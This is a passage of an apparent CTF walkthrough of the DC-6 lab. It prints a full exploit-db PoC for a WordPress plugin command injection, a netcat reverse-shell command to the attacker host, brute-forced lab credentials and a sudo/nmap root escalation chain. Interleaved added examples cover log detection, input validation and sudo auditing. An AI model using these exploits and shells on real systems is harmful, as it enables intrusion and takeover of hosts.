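http/https URL: /wp-admin.php:log=USER&pwd=PASS:s=logout
[Screenshot: specific]
Finally, click Start.
[Screenshot: result]
No result, O(∩_∩)O haha~ moving on

In summary, one username and password were obtained:

No. | Username | Password
1 | mark | helpdesk01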
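
Seen from the server side, the username enumeration in 3.1 and the XML-RPC password attack in 3.3.1 each leave a recognisable pattern in the Apache access log. The Python detector below is an added example, not part of the original walkthrough or of any tool used in it; it flags both patterns per client IP, and the log lines, client addresses and thresholds in it are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" access-log line: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
AUTHOR_RE = re.compile(r'[?&]author=(\d+)')   # author-ID probing
USERS_API = '/wp-json/wp/v2/users'            # REST user listing named in the wpscan output
AUTH_ENDPOINTS = ('/xmlrpc.php', '/wp-login.php')

# Thresholds are assumptions for this example; tune them to real traffic.
ENUM_THRESHOLD = 5                     # distinct author IDs requested by one client
AUTH_THRESHOLD = 20                    # POSTs to one auth endpoint ...
AUTH_WINDOW = timedelta(seconds=60)    # ... inside this sliding window


def parse(line):
    """Return (ip, timestamp, method, path) or None for an unparseable line."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(m['ts'], '%d/%b/%Y:%H:%M:%S %z')
    return m['ip'], ts, m['method'], m['path']


def max_in_window(stamps, window):
    """Largest number of sorted timestamps that fit inside one window."""
    best = start = 0
    for end, ts in enumerate(stamps):
        while ts - stamps[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def detect(lines):
    """Return sorted (rule, client_ip, count) alerts for the given log lines."""
    author_ids = defaultdict(set)
    users_api_hits = defaultdict(int)
    auth_posts = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ip, ts, method, path = rec
        m = AUTHOR_RE.search(path)
        if m:
            author_ids[ip].add(int(m.group(1)))
        if USERS_API in path:
            users_api_hits[ip] += 1
        endpoint = path.split('?', 1)[0]
        if method == 'POST' and endpoint in AUTH_ENDPOINTS:
            auth_posts[(ip, endpoint)].append(ts)

    alerts = []
    for ip, ids in author_ids.items():
        if len(ids) >= ENUM_THRESHOLD:
            alerts.append(('user-enum-author-id', ip, len(ids)))
    # Every REST user-listing hit is reported; logged-in editors may need allow-listing.
    for ip, hits in users_api_hits.items():
        alerts.append(('user-enum-rest-api', ip, hits))
    for (ip, endpoint), stamps in auth_posts.items():
        peak = max_in_window(sorted(stamps), AUTH_WINDOW)
        if peak >= AUTH_THRESHOLD:
            alerts.append(('password-guessing:' + endpoint, ip, peak))
    return sorted(alerts)


def sample_log():
    """Constructed log lines (documentation addresses, not captured from the lab)."""
    t0 = datetime(2024, 5, 28, 12, 44, 35)

    def line(ip, offset, method, path, status):
        ts = (t0 + timedelta(seconds=offset)).strftime('%d/%b/%Y:%H:%M:%S +0000')
        return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 0 "-" "-"'

    scanner, visitor = '192.0.2.10', '198.51.100.7'
    lines = [line(scanner, i, 'GET', f'/?author={i + 1}', 301) for i in range(10)]
    lines.append(line(scanner, 10, 'GET',
                      '/index.php/wp-json/wp/v2/users/?per_page=100&page=1', 200))
    lines += [line(scanner, 20 + i, 'POST', '/xmlrpc.php', 200) for i in range(40)]
    # An ordinary visitor: one author page, one login. Neither should alert.
    lines.append(line(visitor, 5, 'GET', '/?author=1', 301))
    lines.append(line(visitor, 6, 'POST', '/wp-login.php', 302))
    lines.append('truncated or malformed line')
    return lines


if __name__ == '__main__':
    for alert in detect(sample_log()):
        print(alert)
```
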

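3.4 The mark user

3.4.1 Login page

Log in to the admin page with the username and password obtained by brute force.
Admin page: http://192.168.6.157/wp-admin/
[Screenshot: login succeeded]

3.4.2 The Tools plugin

After logging in, the Activity_monitor plugin is visible.
[Screenshot: Tools]
Trying whoami:
[Screenshot: whoami]
Trying the id command:
[Screenshot: id]
In summary, an RCE (remote command execution) vulnerability is present.

3.4.3 Vulnerability search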

┌──(root㉿kali)-[/home/kali]
└─# searchsploit -w Activity monitor
----------------------------------------------------------------------------------------------------------------- --------------------------------------------
 Exploit Title                                                                                                   |  URL
----------------------------------------------------------------------------------------------------------------- --------------------------------------------
Activity Monitor 2002 2.6 - Remote Denial of Service                                                             | https://www.exploit-db.com/exploits/22690
RedHat Linux 6.0/6.1/6.2 - 'pam_console' Monitor Activity After Logout                                           | https://www.exploit-db.com/exploits/19900
WordPress Plugin Plainview Activity Monitor 20161228 - (Authenticated) Command Injection                         | https://www.exploit-db.com/exploits/45274
WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2)           | https://www.exploit-db.com/exploits/50110
----------------------------------------------------------------------------------------------------------------- --------------------------------------------
Shellcodes: No Results
Papers: No Results

This turns up 4 exploit scripts that can be used.

┌──(root㉿kali)-[/home/kali]
└─# searchsploit -x php/webapps/50110.py
  Exploit: WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2)
      URL: https://www.exploit-db.com/exploits/50110
     Path: /usr/share/exploitdb/exploits/php/webapps/50110.py
    Codes: CVE-2018-15877
 Verified: False
File Type: Python script, Unicode text, UTF-8 text executable

3.4.4 Viewing the PoC file

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-6]
└─# cp /usr/share/exploitdb/exploits/php/webapps/50110.py poc.py

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-6]
└─# cat poc.py                                                  
# Exploit Title: WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2)
# Date: 07.07.2021
# Exploit Author: Beren Kuday GORUN
# Vendor Homepage: https://wordpress.org/plugins/plainview-activity-monitor/
# Software Link: https://www.exploit-db.com/apps/2e1f384e5e49ab1d5fbf9eedf64c9a15-plainview-activity-monitor.20161228.zip
# Version: 20161228 and possibly prior
# Fixed version: 20180826
# CVE : CVE-2018-15877

"""
-------------------------
Usage:
┌──(root@kali)-[~/tools]
└─# python3 WordPress-Activity-Monitor-RCE.py
What's your target IP?
192.168.101.28
What's your username?
mark
What's your password?
password123
[*] Please wait...
[*] Perfect!
www-data@192.168.101.28  whoami
www-data
www-data@192.168.101.28  pwd
/var/www/html/wp-admin
www-data@192.168.101.28  id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
"""

import requests
from bs4 import BeautifulSoup

def exploit(whoami, ip):
    while 1:
        cmd = input(whoami+"@"+ip+"  ")
        url = 'http://' + ip + '/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools'
        payload = "google.com.tr | " + cmd
        data = {'ip': payload , 'lookup' : 'lookup' }
        x = requests.post(url, data = data, cookies=getCookie(ip))
        html_doc = x.text.split("<p>Output from dig: </p>")[1]
        soup = BeautifulSoup(html_doc, 'html.parser')
        print(soup.p.text)

def poc(ip):
    url = 'http://' + ip + '/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools'
    myobj = {'ip': 'google.fr | whoami', 'lookup' : 'lookup' }
    x = requests.post(url, data = myobj, cookies=getCookie(ip))
    html_doc = x.text.split("<p>Output from dig: </p>")[1]
    soup = BeautifulSoup(html_doc, 'html.parser')
    print("[*] Perfect! ")
    exploit(soup.p.text, ip)

def getCookie(ip):
    url = 'http://' + ip + '/wp-login.php'
    #log=admin&pwd=admin&wp-submit=Log+In&redirect_to=http%3A%2F%2Fwordy%2Fwp-admin%2F&testcookie=1
    data = {'log':username, 'pwd':password, 'wp-submit':'Log In', 'testcookie':'1'}
    x = requests.post(url, data = data)
    cookies = {}
    cookie = str(x.headers["Set-Cookie"])
    for i in cookie.split():
        if(i.find("wordpress") != -1 and i.find("=") != -1):
            cookies[i.split("=")[0]] = i.split("=")[1][:len(i.split("=")[1])-1]
    return cookies

ip = input("What's your target IP?\n")
username = input("What's your username?\n")
password = input("What's your password?\n")
print("[*] Please wait...")
poc(ip)                                      

The PoC file itself documents how it is used.
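The PoC reaches the shell through the plugin's `ip` field with values of the form `google.fr | whoami`. The following is an added example, not the plugin's code (which is PHP) and not part of the original article, showing how a lookup handler closes this class of bug: accept only an IP address or hostname, and pass it as one argv element with no shell. All function names are hypothetical, and the string built by `unsafe_command_line` is an assumed analog of the vulnerable pattern.

```python
import ipaddress
import re
import subprocess

# One DNS label: letters, digits, hyphen; no leading or trailing hyphen.
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")


def unsafe_command_line(value):
    """Analog of the vulnerable pattern: user input concatenated into a shell
    command line. Built only for comparison, never executed here."""
    return "dig " + value


def validate_lookup_target(value):
    """Return the target if it is an IP address or hostname, else raise ValueError."""
    if not isinstance(value, str) or not value or len(value) > 253:
        raise ValueError("empty or over-long lookup target")
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        pass  # not an IP literal; fall through to the hostname check
    labels = value.rstrip(".").split(".")
    # fullmatch: whitespace, "|", ";", "$", quotes and newlines all fail here
    if all(_LABEL.fullmatch(label) for label in labels):
        return value
    raise ValueError("lookup target is not an IP address or hostname")


def build_dig_argv(value):
    """argv list for the lookup; the target is a single element, never re-parsed."""
    return ["dig", "+short", validate_lookup_target(value)]


def lookup(value, timeout=5.0):
    """Run the lookup without a shell (a list argv with the default shell=False)."""
    result = subprocess.run(build_dig_argv(value), capture_output=True,
                            text=True, timeout=timeout, check=False)
    return result.stdout
```

Validation and shell-free execution are independent layers: either one alone stops the `| whoami` form, and keeping both means a later change to one does not reopen the hole.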

3.4.5 Running the PoC file

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-6]
└─# python poc.py              
What's your target IP?
192.168.6.157
What's your username?
mark
What's your password?
helpdesk01
[*] Please wait...
[*] Perfect! 
www-data@192.168.6.157  

3.4.6 Reverse shell

3.4.6.1 Listening on port 6666 on Kali
┌──(root㉿kali)-[/home/kali]
└─# nc -lvvp 6666                      
listening on [any] 6666 ...
3.4.6.2 Reverse shell

In the terminal where poc.py is running:

www-data@192.168.6.157  nc -e /bin/sh 192.168.6.66 6666
3.4.6.3 Spawning a standard terminal
┌──(root㉿kali)-[/home/kali]
└─# nc -lvvp 6666                      
listening on [any] 6666 ...
connect to [192.168.6.66] from wordy [192.168.6.157] 56862
python -c "import pty;pty.spawn('/bin/bash')"
www-data@dc-6:/var/www/html/wp-admin$ 

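The standard terminal was spawned successfully.

3.4.7 Trying SUID privilege escalation

Look for files with the SUID bit (4000) set, suppressing other error messages: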

www-data@dc-6:/var/www/html/wp-admin$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/passwd
/bin/su
/bin/mount
/bin/umount
/bin/ping
www-data@dc-6:/var/www/html/wp-admin$ 

Nothing useful.

3.4.8 More system information

The account details for the graham user are found in a file under /home/mark/stuff.

www-data@dc-6:/var/www/html/wp-admin$ cd /home
cd /home
www-data@dc-6:/home$ ls
ls
graham	jens  mark  sarah
www-data@dc-6:/home$ cd mark
cd mark
www-data@dc-6:/home/mark$ ls
ls
stuff
www-data@dc-6:/home/mark$ cd stuff
cd stuff
www-data@dc-6:/home/mark/stuff$ ls
ls
things-to-do.txt
www-data@dc-6:/home/mark/stuff$ cat th*
cat th*
Things to do:

- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement

Account details obtained:

No. | Username | Password
1   | graham   | GSo7isUM1D4

3.5 The graham user

3.5.1 Switching to the graham user

www-data@dc-6:/home/mark/stuff$ su graham
su graham
Password: GSo7isUM1D4

graham@dc-6:/home/mark/stuff$ 

Logged in as graham successfully.

3.5.2 Trying sudo privilege escalation again

graham@dc-6:/home/mark/stuff$ sudo -l
sudo -l
Matching Defaults entries for graham on dc-6:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh

This reveals /home/jens/backups.sh.

3.5.3 Appending bash to backups.sh

graham@dc-6:/home/jens$ echo "/bin/bash" >> backups.sh
echo "/bin/bash" >> backups.sh
graham@dc-6:/home/jens$ 

3.6 The jens user

3.6.1 Switching to the jens user

graham@dc-6:/home/jens$ sudo -u jens ./backups.sh
sudo -u jens ./backups.sh
tar: Removing leading `/' from member names
jens@dc-6:~$ 

Switched to the jens user successfully.

3.6.2 Checking SUID executables

jens@dc-6:~$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/passwd
/bin/su
/bin/mount
/bin/umount
/bin/ping
jens@dc-6:~$ 

3.6.3 Checking the commands sudo allows

sudo -l
Matching Defaults entries for jens on dc-6:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jens may run the following commands on dc-6:
    (root) NOPASSWD: /usr/bin/nmap

The command that can be run through sudo is /usr/bin/nmap.

3.7 Privilege escalation with nmap

3.7.1 Creating the shell.nse file

jens@dc-6:~$ echo 'os.execute("/bin/bash")' > shell.nse
echo 'os.execute("/bin/bash")' > shell.nse
jens@dc-6:~$ ls
ls
backups.sh  backups.tar.gz  shell.nse
jens@dc-6:~$ 

3.7.2 Running the shell.nse file

jens@dc-6:~$ sudo -u root nmap --script=shell.nse
sudo -u root nmap --script=shell.nse

Starting Nmap 7.40 ( https://nmap.org ) at 2024-05-29 22:52 AEST
root@dc-6:/home/jens# 

After a lot of hard work, root at last, O(∩_∩)O haha~
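Both hops above come from sudo rules: graham may run a script as jens that graham can also write to, and jens may run nmap, which executes caller-supplied scripts, as root. The following is an added example, not part of the original article, of an audit that parses `sudo -l` output and flags both patterns; the function names, the short program list and the joined sample listing are constructed for illustration.

```python
import os
import re
import stat

# Constructed sample: the two `sudo -l` listings from this walkthrough, joined.
SAMPLE = """\
User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh
User jens may run the following commands on dc-6:
    (root) NOPASSWD: /usr/bin/nmap
"""

# Programs that run caller-supplied scripts or shells (short, non-exhaustive).
SCRIPTABLE = {"nmap", "vim", "less", "find", "awk", "perl", "python", "bash", "sh"}
RULE = re.compile(r"^\s+\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text):
    """Yield (runas, nopasswd, command_path) for every rule in `sudo -l` output."""
    for line in text.splitlines():
        m = RULE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            if cmd.strip():
                yield m.group("runas"), nopasswd, cmd.split()[0]


def loosely_writable(path):
    """True if the file or its directory is group- or world-writable."""
    for p in (path, os.path.dirname(path) or "."):
        try:
            if os.stat(p).st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                return True
        except OSError:
            pass  # path missing on this host: nothing to check
    return False


def audit(text, writable=loosely_writable):
    """Return (runas, path, nopasswd, reason) for each risky sudo rule."""
    findings = []
    for runas, nopasswd, path in parse_sudo_l(text):
        if os.path.basename(path) in SCRIPTABLE:
            findings.append((runas, path, nopasswd, "runs caller-supplied scripts"))
        if writable(path):
            findings.append((runas, path, nopasswd, "writable by group or others"))
    return findings
```

Run `audit()` on the host itself so that `loosely_writable` inspects the real permissions; a rule flagged for either reason hands the invoking user the target account.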

3.7.3 Reading the flag

root@dc-6:/home/jens# find / -name *flag*
/var/www/html/wp-includes/images/icon-pointer-flag.png
/var/www/html/wp-includes/images/icon-pointer-flag-2x.png
/var/lib/mysql/debian-10.1.flag
/usr/lib/x86_64-linux-gnu/perl/5.24.1/bits/waitflags.ph
/sys/kernel/debug/tracing/events/power/pm_qos_update_flags
/sys/devices/pci0000:00/0000:00:11.0/0000:02:01.0/net/eth0/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/virtual/net/lo/flags
/sys/module/scsi_mod/parameters/default_dev_flags
/proc/sys/kernel/acpi_video_flags
/proc/kpageflags
/root/theflag.txt
root@dc-6:/home/jens# cat /root/theflag.txt

Yb        dP 888888 88     88         8888b.   dP"Yb  88b 88 888888 d8b 
 Yb  db  dP  88__   88     88          8I  Yb dP   Yb 88Yb88 88__   Y8P 
  YbdPYbdP   88""   88  .o 88  .o      8I  dY Yb   dP 88 Y88 88""   `"' 
   YP  YP    888888 88ood8 88ood8     8888Y"   YbodP  88  Y8 888888 (8) 

Congratulations!!!

Hope you enjoyed DC-6.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.

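Penetration summary

In the DC-6 lab, tools such as nmap and whatweb were used for the penetration test: nmap for host discovery and port scanning, dirb for directory scanning, whatweb for web page information gathering, which yielded key information, and wpscan for brute-forcing the usernames and passwords. Finally, Linux privilege escalation was carried out and all the flags were obtained. The approach was:

  • Host discovery and port scanning with nmap
  • Directory scanning with dirb
  • Vulnerability search
  • Obtaining the PoC and running the PoC file
  • Reverse shell
  • Exploring system information as 3 users (mark, graham, jens)
  • Gaining root privileges with nmap
  • Linux kernel privilege escalation, and obtaining the flag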

